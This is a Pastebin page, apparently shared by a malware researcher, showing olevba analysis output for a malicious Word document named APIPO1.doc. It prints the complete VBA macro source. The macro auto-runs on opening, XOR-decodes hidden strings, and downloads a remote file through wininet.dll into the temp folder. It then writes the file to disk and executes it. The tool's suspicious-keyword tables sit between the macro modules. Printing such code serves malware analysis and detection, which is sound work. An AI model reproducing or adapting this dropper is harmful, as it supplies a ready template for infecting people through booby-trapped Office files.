API tools faq
paste
Advertisement
dynamoo

Malicious Word macro

dynamoo
Mar 31st, 2015
682
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 13.08 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- APIPO1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: APIPO1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: APIPO1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. ALBACAL3
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO OIDL8.bas
  27. in file: APIPO1.doc - OLE stream: u'Macros/VBA/OIDL8'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29.  
  30.  
  31.  
  32.  
  33.  
  34.  
  35.  
  36. Sub ALBACAL3()
  37. Dim CHEG As Integer
  38. CHEG = 81
  39. ITSALLABAMA (CHEG)
  40.  
  41. End Sub
  42.  
  43. Public Function KALLKKKASKAJJAS(IIIIIBRDA1 As String, IIIIIBRDA2 As String) As String
  44.     Dim ZINGMAH30 As Long
  45.     Dim ZINGMAH30O As String
  46.     Dim ZINGMAH300 As Integer
  47.     Dim ZINGMAH3001 As Integer
  48.     For ZINGMAH30 = 1 _
  49.     To _
  50.     ( _
  51.     LEFUNCLE1 _
  52.     (IIIIIBRDA2) _
  53.     / 2)
  54.         ZINGMAH300 = Val("&H" & _
  55.         (Mid$(IIIIIBRDA2, _
  56.         (2 * ZINGMAH30) - 1, 2)))
  57.         ZINGMAH3001 = Asc(Mid$(IIIIIBRDA1, _
  58.         ((ZINGMAH30 Mod Len(IIIIIBRDA1)) + 1), 1))
  59.         ZINGMAH30O = ZINGMAH30O + Chr(ZINGMAH300 Xor ZINGMAH3001)
  60.     Next ZINGMAH30
  61.    KALLKKKASKAJJAS = ZINGMAH30O
  62. End Function
  63.  
  64. Public Function LEFUNCLE1(Papapa1 As String) As Integer
  65. LEFUNCLE1 = Len(Papapa1)
  66. End Function
  67.  
  68. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  69. ANALYSIS:
  70. +------------+---------+-----------------------------------------+
  71. | Type       | Keyword | Description                             |
  72. +------------+---------+-----------------------------------------+
  73. | Suspicious | Chr     | May attempt to obfuscate specific       |
  74. |            |         | strings                                 |
  75. | Suspicious | Xor     | May attempt to obfuscate specific       |
  76. |            |         | strings                                 |
  77. +------------+---------+-----------------------------------------+
  78. -------------------------------------------------------------------------------
  79. VBA MACRO PIDLE0.bas
  80. in file: APIPO1.doc - OLE stream: u'Macros/VBA/PIDLE0'
  81. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  82.  
  83. #If VBA7 And Win64 Then
  84. Public Declare PtrSafe Function SEEEGMATICKS1222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
  85. Public Declare PtrSafe Function SEEEGMATICKS122 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
  86. Public Declare PtrSafe Function SEEEGMATICKS21 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As LongPtr, ByVal SA33LOOOOMMA442 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  87. Public Declare PtrSafe Function SEEEGMATICKS1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
  88. #Else
  89. Public Declare Function SEEEGMATICKS1222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
  90. Public Declare Function SEEEGMATICKS122 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
  91. Public Declare Function SEEEGMATICKS21 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As Long, ByVal SA33LOOOOMMA442 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  92. Public Declare Function SEEEGMATICKS1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
  93. #End If
  94.  
  95.  
  96. Public Const WIIIN34DIS6 = "3701130605472B07141A0D0D0D1F1F0219"
  97. Public Const WIIIN34DIS5 = "38021D0B0D0D0B0753144A0B140E"
  98. Public Const WIIIN34DIS4 = "0C1D021A5346450F0D170A1D040A1418141B050711440A06075851424B595445131512"
  99. Public Const WIIIN34DIS3 = "370A0403191D031903582207000E2514040701043908030C0903"
  100. Public Const WIIIN34DIS2 = "sdivjiijwdvdnlkvmw"
  101.  
  102.  
  103.  
  104.  
  105. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  106. ANALYSIS:
  107. +------------+----------------+-----------------------------------------+
  108. | Type       | Keyword        | Description                             |
  109. +------------+----------------+-----------------------------------------+
  110. | Suspicious | Lib            | May run code from a DLL                 |
  111. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  112. |            |                | be used to obfuscate strings (option    |
  113. |            |                | --decode to see all)                    |
  114. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  115. |            |                | may be used to obfuscate strings        |
  116. |            |                | (option --decode to see all)            |
  117. | IOC        | wininet.dll    | Executable file name                    |
  118. +------------+----------------+-----------------------------------------+
  119. -------------------------------------------------------------------------------
  120. VBA MACRO IDL4.bas
  121. in file: APIPO1.doc - OLE stream: u'Macros/VBA/IDL4'
  122. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  123. Sub ITSALLABAMA(IHMAPARAM1828 As Long)
  124.  
  125. ITSALBATROS ("OOOOOOOAOANNNNNN3112221")
  126. End Sub
  127.  
  128.  
  129. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  130. ANALYSIS:
  131. No suspicious keyword or IOC found.
  132. -------------------------------------------------------------------------------
  133. VBA MACRO FILE6.bas
  134. in file: APIPO1.doc - OLE stream: u'Macros/VBA/FILE6'
  135. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  136.  
  137. Public Const THEPARAMK23 = "KAKAJIDO"
  138.  
  139.  
  140. Public _
  141. Function ITSALBATROS(PERKADO _
  142. As _
  143. String)
  144. Sub1
  145. End Function
  146. Public Function Sub1()
  147.  
  148. Dim OOOOOOO8888888  As Object
  149. Set OOOOOOO8888888 = CreateObject _
  150. (KALLKKKASKAJJAS(WIIIN34DIS2, WIIIN34DIS3))
  151.  
  152. Dim KLALAKKSKKNNCN0 As Integer
  153. For KLALAKKSKKNNCN0 = 0 To 0
  154. If KLALAKKSKKNNCN0 = 5 Then End
  155. Next KLALAKKSKKNNCN0
  156. Dim ETOPART98 As Object
  157. Set ETOPART98 = Sub2(OOOOOOO8888888)
  158. Dim ZS67AASCCS As Integer
  159. For ZS67AASCCS = 0 To 0
  160. If ZS67AASCCS = 5 Then End
  161. Next ZS67AASCCS
  162. Dim HAZ82767
  163. ASDFKJF = KALLKKKASKAJJAS(WIIIN34DIS2, WIIIN34DIS5)
  164. HAZ82767 = ETOPART98 & ASDFKJF
  165. Dim LOOO9371003942732 As Integer
  166. For LOOO9371003942732 = 6 To 10
  167. If LOOO9371003942732 = 5 Then End
  168. Next LOOO9371003942732
  169. 'Set OOOOOOO8888888 = CreateObject _
  170. '(KALLKKKASKAJJAS(WIIIN34DIS2, WIIIN34DIS3))
  171. Dim NSMSBSDSAS7 As Integer
  172. For NSMSBSDSAS7 = 0 To 0
  173. If NSMSBSDSAS7 = 5 Then End
  174. Next NSMSBSDSAS7
  175.  
  176. If Sub3(OOOOOOO8888888, HAZ82767) Then
  177. OOOOOOO8888888. _
  178. DeleteFile HAZ82767
  179. End If
  180. If TDSHKAMPOT2122(HAZ82767) Then
  181. End If
  182. Set SSSS = Nothing
  183. If Sub3(OOOOOOO8888888, HAZ82767) Then
  184. End If
  185. Set SASASA = CreateObject _
  186. (KALLKKKASKAJJAS _
  187. (WIIIN34DIS2, WIIIN34DIS6))
  188. SASASA.Open HAZ82767
  189. End Function
  190.  
  191. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  192. ANALYSIS:
  193. +------------+----------------+-----------------------------------------+
  194. | Type       | Keyword        | Description                             |
  195. +------------+----------------+-----------------------------------------+
  196. | Suspicious | CreateObject   | May create an OLE object                |
  197. | Suspicious | Open           | May open a file                         |
  198. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  199. |            |                | be used to obfuscate strings (option    |
  200. |            |                | --decode to see all)                    |
  201. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  202. |            |                | may be used to obfuscate strings        |
  203. |            |                | (option --decode to see all)            |
  204. +------------+----------------+-----------------------------------------+
  205. -------------------------------------------------------------------------------
  206. VBA MACRO IDL3.bas
  207. in file: APIPO1.doc - OLE stream: u'Macros/VBA/IDL3'
  208. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  209. Public Function Sub2(ByRef Ob5 As Object) As Object
  210. Set Sub2 = Ob5.GetSpecialFolder(2)
  211. End Function
  212.  
  213. Public Function Sub3(ByRef Ob6 As Object, ByVal ascascas As String) As Boolean
  214. If Ob6.FileExists(ascascas) Then
  215. Sub3 = True
  216. Else
  217. Sub3 = False
  218. End If
  219. End Function
  220. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  221. ANALYSIS:
  222. No suspicious keyword or IOC found.
  223. -------------------------------------------------------------------------------
  224. VBA MACRO SIDL22.bas
  225. in file: APIPO1.doc - OLE stream: u'Macros/VBA/SIDL22'
  226. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  227. Option Explicit
  228.  
  229.  
  230. Private Const IPPTDSH872 = 8162
  231. Private Const IPPTDSH871 As String = "MisterZALALU"
  232. Private Const IPPTDSH999 = 1
  233. Private Const cCCc = &H4000000
  234. Public Function TDSHKAMPOT2122 _
  235. (ByVal ITSTO As String) As Boolean
  236.     #If VBA7 _
  237.     And Win64 Then
  238.         Dim LPT1 As LongPtr, LPT2 As LongPtr
  239.     #Else
  240.         Dim LPT1 As Long, LPT2 As Long
  241.     #End If
  242.     Dim CDSFDFD As Long
  243.     Dim SA33LOOOOMMA442 As String * IPPTDSH872, CCEWGREHRHERHER33 As String
  244.     Dim EFEWFWEFWEFWEF As Integer, lddta As Double
  245.     LPT1 = SEEEGMATICKS122(IPPTDSH871, IPPTDSH999, vbNullString, vbNullString, 0)
  246.     If LPT1 = 0 Then
  247.         Exit Function
  248.     End If
  249.     Dim ITSFROM As String
  250.     ITSFROM = KALLKKKASKAJJAS(WIIIN34DIS2, WIIIN34DIS4)
  251.    
  252.     LPT2 = SEEEGMATICKS1(LPT1, ITSFROM, vbNullString, 0, cCCc, 0)
  253.     If LPT2 = 0 Then
  254.         lddta = 0
  255.     Else
  256.         SEEEGMATICKS21 LPT2, SA33LOOOOMMA442, IPPTDSH872, CDSFDFD
  257.         CCEWGREHRHERHER33 = SA33LOOOOMMA442
  258.         Do While CDSFDFD <> 0
  259.             SEEEGMATICKS21 LPT2, SA33LOOOOMMA442, IPPTDSH872, CDSFDFD
  260.            
  261.             Dim SSSDFDSFLLSLLS As Integer
  262. For SSSDFDSFLLSLLS = 0 To 0
  263. If SSSDFDSFLLSLLS = 5 Then End
  264. Next SSSDFDSFLLSLLS
  265.            
  266.             CCEWGREHRHERHER33 = CCEWGREHRHERHER33 + Mid(SA33LOOOOMMA442, 1, CDSFDFD)
  267.         Loop
  268.         lddta = Len(CCEWGREHRHERHER33): EFEWFWEFWEFWEF = FreeFile
  269.         Open ITSTO _
  270.         For Binary _
  271.         Access Write _
  272.         Lock Write _
  273.         As #EFEWFWEFWEFWEF
  274.         Put #EFEWFWEFWEFWEF, _
  275.         , CCEWGREHRHERHER33
  276.         ':
  277.        
  278.         Dim ssdcdcdsDDDDD As Integer
  279. For ssdcdcdsDDDDD = 0 To 0
  280. If ssdcdcdsDDDDD = 5 Then End
  281. Next ssdcdcdsDDDDD
  282.         Close #EFEWFWEFWEFWEF
  283.     End If
  284.     SEEEGMATICKS1222 LPT2
  285.     SEEEGMATICKS1222 LPT1
  286.     CCEWGREHRHERHER33 = ""
  287.     If lddta Then
  288.         TDSHKAMPOT2122 = True
  289.     End If
  290. End Function
  291. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  292. ANALYSIS:
  293. +------------+----------------+-----------------------------------------+
  294. | Type       | Keyword        | Description                             |
  295. +------------+----------------+-----------------------------------------+
  296. | Suspicious | Open           | May open a file                         |
  297. | Suspicious | Write          | May write to a file (if combined with   |
  298. |            |                | Open)                                   |
  299. | Suspicious | Put            | May write to a file (if combined with   |
  300. |            |                | Open)                                   |
  301. | Suspicious | Binary         | May read or write a binary file (if     |
  302. |            |                | combined with Open)                     |
  303. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  304. |            |                | may be used to obfuscate strings        |
  305. |            |                | (option --decode to see all)            |
  306. +------------+----------------+-----------------------------------------+
  307. -------------------------------------------------------------------------------
  308. VBA MACRO UserForm1.frm
  309. in file: APIPO1.doc - OLE stream: u'Macros/VBA/UserForm1'
  310. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  311. (empty macro)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!